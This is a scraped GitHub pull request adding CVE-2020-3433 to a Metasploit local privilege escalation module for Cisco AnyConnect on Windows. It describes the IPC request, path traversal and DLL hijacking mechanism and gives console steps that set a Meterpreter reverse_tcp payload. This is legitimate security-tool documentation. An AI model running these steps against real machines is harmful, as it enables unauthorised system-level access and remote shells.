-
Notifications
You must be signed in to change notification settings - Fork 13.8k
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Added CVE-2020-3433 module #14187
Merged
Merged
Added CVE-2020-3433 module #14187
Conversation
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
To be clear, here is it working with both CVEs....
|
bwatters-r7
added a commit
that referenced
this pull request
Sep 29, 2020
Release NotesRenamed the |
Thanks @bwatters-r7! |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Add this suggestion to a batch that can be applied as a single commit.
This suggestion is invalid because no changes were made to the code.
Suggestions cannot be applied while the pull request is closed.
Suggestions cannot be applied while viewing a subset of changes.
Only one suggestion per line can be applied in a batch.
Add this suggestion to a batch that can be applied as a single commit.
Applying suggestions on deleted lines is not supported.
You must change the existing code in this line in order to create a valid suggestion.
Outdated suggestions cannot be applied.
This suggestion has been applied or marked resolved.
Suggestions cannot be applied from pending reviews.
Suggestions cannot be applied on multi-line comments.
Suggestions cannot be applied while the pull request is queued to merge.
Suggestion cannot be applied right now. Please check back later.
Hi,
This PR changes modules/exploit/windows/local/anyconnect_path_traversal_lpe module that exploits CVE-2020-3153 (msf module by @cdelafuente-r7) to add the possibility to exploit another local privilege escalation that I found in Cisco AnyConnect for Windows: CVE-2020-3433.
By default, this module will exploit CVE-2020-3433 (more versions vulnerable) but you can set an option to exploit CVE-2020-3153 (if vulnerable).
Cisco's advisory: link
My PoC and technical details for CVE-2020-3433 (+ CVE-2020-3434 & CVE-2020-3435) are on my GitHub: link (in particular, you can check the Details.md file).
Antoine
Vulnerable Application
The installer component of Cisco AnyConnect Secure Mobility Client for Windows
prior to 4.8.02042 is vulnerable to path traversal and allows local attackers
to create/overwrite files in arbitrary locations with system level privileges.
The installer component of Cisco AnyConnect Secure Mobility Client for Windows
prior to 4.9.00086 is vulnerable to a DLL hijacking and allows local attackers
to execute code on the affected machine with with system level privileges.
Both attacks consist in sending a specially crafted IPC request to the TCP
port 62522 on the loopback device, which is exposed by the Cisco AnyConnect
Secure Mobility Agent service. This service will then launch the vulnerable
installer component (
vpndownloader
), which copies itself to an arbitrarylocation (CVE-2020-3153) or with a supplied DLL (CVE-2020-3433) before being
executed with system privileges. Since
vpndownloader
is also vulnerable to DLLhijacking, a specially crafted DLL (
dbghelp.dll
) is created at the samelocation
vpndownloader
will be copied to get code execution with systemprivileges.
The CVE-2020-3153 exploit has been successfully tested against Cisco AnyConnect
Secure Mobility Client versions 4.5.04029, 4.5.05030 and 4.7.04056 on Windows 10
version 1909 (x64) and Windows 7 SP1 (x86); the CVE-2020-3434 exploit has been
successfully tested against Cisco AnyConnect Secure Mobility Client versions
4.5.02036, 4.6.03049, 4.7.04056, 4.8.01090 and 4.8.03052 on Windows 10 version
1909 (x64) and 4.7.4056 on Windows 7 SP1 (x64).
AnyConnect Secure Mobility Client is not publicly available and only customers
with active contracts can download it. For this reason, download links have not
been provided.
Verification Steps
use exploit/windows/local/anyconnect_lpe
set SESSION <SESSION>
set payload windows/meterpreter/reverse_tcp
set LHOST <LHOST>
set LPORT <LPORT>
check
run
Options
INSTALL_PATH
Set Cisco AnyConnect Secure Mobility Client installation path (where
vpndownloader.exe
should be found). It will be automatically detectedif not set.CVE
Set the CVE to use (CVE-2020-3153 or CVE-2020-3433). Default: CVE-2020-3433.
ForceExploit
Set this to
true
to override thecheck
result during exploitation.